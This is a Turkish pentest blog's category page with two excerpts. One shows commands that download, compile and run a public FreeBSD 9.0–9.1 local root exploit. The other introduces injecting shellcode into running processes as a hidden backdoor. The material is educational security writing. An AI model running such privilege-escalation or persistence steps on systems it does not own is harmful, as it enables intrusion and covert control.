Category: Linux Pentest

FreeBSD 9 Yetki Yükseltme Açıklığı

Bu blog girdisi bizim sunucumuzdan (cehturkiye). Root parolamızı çeşitli nedenlerden dolayı unuttuk, bugün lazım oldu ve aşağıdaki detaylarını aktardığımız FreeBSD 9.0-9.1 sürümlerini etkileyen local root exploit ile yetki arttırımına gittik. İlgili exploit; http://www.exploit-db.com/exploits/26368/ Kullanımı $ wget http://www.exploit-db.com/download/26368 -O exp.c $ whoami ozanucar $ gcc -o exp exp.c $ chmod +x exp $ ./exp FreeBSD 9.{0,1} mmap/ptrace exploit by Hunger <[email protected]> #...

Varolan bir process’e shellcode enjekte etmek

Pentest çalışmalarında, hedef sisteme erişim elde edildikden sonra sistemde kalıcı hale gelmek için arka kapılar oluşturulur.Bu konuda geliştirilen tekniklerden biri, çalışan bir process’e kod enjekte etmekdir. Bu yöntemle, process’in dosya sistemindeki binary’sine herhangi bir zarar verilmediği için süreç RAM’de devam eder. Dolayısıyla, kendini diske yazan backdoor’lara göre tespit edilmesi daha da güçtür. Bir başka yazıda, analiz teknikleri yer alacaktır. Cymothoa,...

CEH Türkiye Hosting Sponsoru